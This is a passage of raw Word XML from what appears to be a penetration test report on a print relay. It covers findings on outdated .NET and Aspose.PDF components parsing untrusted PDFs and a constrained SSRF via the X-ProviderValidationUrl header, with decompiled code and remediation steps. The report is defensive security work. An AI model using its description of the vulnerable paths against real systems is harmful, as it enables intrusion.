        <w:t>Aspose.PDF.dll                                 20.10.0.0     (~35 MB, released 2020-10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Newtonsoft.Json.dll                            11.0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Target framework (exe.config)                  .NETFramework v4.8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Untrusted print path (decompiled, PdfPrinting.PrintPdf):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>bytes = Convert.FromBase64String(base64);   // attacker-controlled PDF bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// ... handed to Aspose.PDF 20.10 for rendering/printing ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// VULNE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RABLE: an end-of-life runtime and a 2020-era PDF library parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// attacker-supplied documents; no patches for known CVEs in these versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB8EFB" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="6C38FFAF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Component versions extracted from the installer payload (MSI File table / assembly versions):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5C7DF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C1940D" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microsoft.AspNetCore.Server.Kestrel.Core.dll   2.2.0.18316   (ASP.NET Core 2.2 - EOL 2019-12-23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5968A0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aspose.PDF.dll                                 20.10.0.0     (~35 MB, released 2020-10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F9AEB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Newtonsoft.Json.dll                            11.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6E636" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Target framework (exe.config)                  .NETFramework v4.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA9257" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DBCDCAA" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Untrusted print path (decompiled, PdfPrinting.PrintPdf): bytes = Convert.FromBase64String(base64); stream = new MemoryStream(bytes); viewer.BindPdf(stream); viewer.PrintDocumentWithSettings(printerSettings</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>); —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no size cap, no sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A1D0D" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Attack Path (Executive View)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE97DE0" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51048FAE" wp14:editId="3708E359">
            <wp:extent cx="5943600" cy="41064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exec.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4106487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8EC17C" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure M7 — Attack path: end-of-life runtime and a 2020-era PDF library — which no longer receive security fixes — parse attacker-supplied documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A173FC" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="0DEB5E65" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199105FC" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: get back onto supported, patchable components and isolate untrusted PDF parsing. Plan as a short project, not a one-line change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F5E59" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Re-platform onto a supported .NET LTS release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF37950" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Target a supported LTS (e.g. .NET 8). Update the project file and replace ASP.NET Core 2.2 packages with current equivalents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681CB01" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;!-- project.csproj --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;TargetFramework&gt;net8.0&lt;/TargetFramework&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;!-- remove Microsoft.AspNetCore.* 2.2.* package refs; use the in-box ASP.NET Core shared framework --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55B024" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Upgrade the third-party libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E53398E" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Move Aspose.PDF and Newtonsoft.Json to current supported versions; consider System.Text.Json where feasible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D3ECAE" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>dotnet add package Aspose.PDF        # latest supported</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>dotnet add package Newtonsoft.Json   # latest 13.x, or migrate to System.Text.Json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B9EDD" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 3. Add dependency scanning to CI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A3AFC" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fail the build on known-vulnerable packages so this posture cannot silently regress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22359FF4" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t># CI step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>dotnet list package --vulnerable --include-transitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E461546" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 4. Constrain and isolate PDF parsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB2320" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enforce a maximum PDF size, and render/parse untrusted PDFs in a separate low-privilege, sandboxed process so a parser compromise cannot reach the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F76D6" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>if (pdfBytes.Length &gt; MaxPdfBytes) return BadRequest("PDF too large");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:br/>
        <w:t>// hand parsing to a sandboxed worker process / container with no network + least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382EE561" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) the app runs on the new runtime; (2) dependency scan reports no known-vulnerable packages; (3) an oversized PDF is rejected; (4) the parsing worker runs under a restricted account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A229AF8" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="1CA0090B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287A2AB" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.NET and .NET Core support policy — dotnet.microsoft.com/platform/support/policy/dotnet-core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68785262" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CWE-1104: Use of Unmaintained </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Third Party</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Components — cwe.mitre.org/data/definitions/1104.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD78C1" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-20: Improper Input Validation — cwe.mitre.org/data/definitions/20.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E6752" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCCA77A" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B33B3D" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2927B5CA" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7BB1B0" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DBF3F2" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EC29E7" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A4A1C3B" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FE831F" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A77CE7" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439837D5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D611215"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093ADAB7" w14:textId="77777777" w:rsidTr="002E6C25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589E7B25" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="_Toc9000007"/>
            <w:bookmarkStart w:id="19" w:name="_Toc232079917"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>8. Constrained Server-Side Request Forgery via X-ProviderValidationUrl - Low</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
            <w:bookmarkEnd w:id="19"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52E729C9"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31E55807" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466ECB33"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Low</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  CVSS 3.1: 3.5 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N</w:t>
      </w:r>
      <w:r w:rsidRPr="00711F1D">
        <w:rPr>
          <w:b/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23764862" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected component: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PrintController.isUserTokenValid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> outbound HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC39DD0" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>As part of token validation, the relay issues a server-side HTTP POST to the URL provided in the X-ProviderValidationUrl header. An attacker can therefore induce the workstation to make outbound POST requests to hosts and paths of their choosing, subject to the constraint that the URL must contain the substring "okta". The response success/error condition acts as a limited oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89EF9B" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitability is constrained by the "okta" substring requirement and the absence of response reflection to the caller, which is why this is rated Low. It is nonetheless an attacker-influenced outbound request originating from inside the user's network and is fully remediated by the fix for the Critical finding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9EC3E" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8E5AF" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Outbound request construction (decompiled, isUserTokenValid): client.BaseAddress = new Uri(scheme + "://" + host) where host derives from the attacker-supplied header; client.SendAsync(req) is then issued. See the Critical finding for the full reconstruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D803847" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFBBD22" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Goal: eliminate the caller-controlled destination so the relay cannot be steered to attacker infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169383D1" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 1. Use a fixed, server-configured endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434A0D3" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apply the Finding 1 fix: the outbound validation target comes from configuration, never from request input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A8575" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Step 2. Enforce egress allowlisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AECC4B" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:pStyle w:val="ListBullet2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>At the host/network layer, permit outbound validation traffic only to the known Okta tenant host(s); deny all other egress from the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E03D92" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="00751205">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9F7EF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">✔ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Verify: (1) the service cannot make outbound requests to any host other than the configured Okta tenant; (2) supplying a different validation host has no effect on where the relay connects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7128F" w14:textId="77777777" w:rsidR="009F2D8A" w:rsidRDefault="009F2D8A"/>
    <w:p w14:paraId="797FCFFD" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B0729" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-918: Server-Side Request Forgery (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SSRF) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cwe.mitre.org/data/definitions/918.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E7940" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="00AC2403">
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP Top 10 2021 A10: Server-Side Request Forgery — owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EE5F6C" w14:textId="77777777" w:rsidR="009C1336" w:rsidRDefault="009C1336">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294B12E5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672DBFB5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076EDE7F" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B0D7D5" w14:textId="77777777" w:rsidR="00200159" w:rsidRDefault="00200159">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
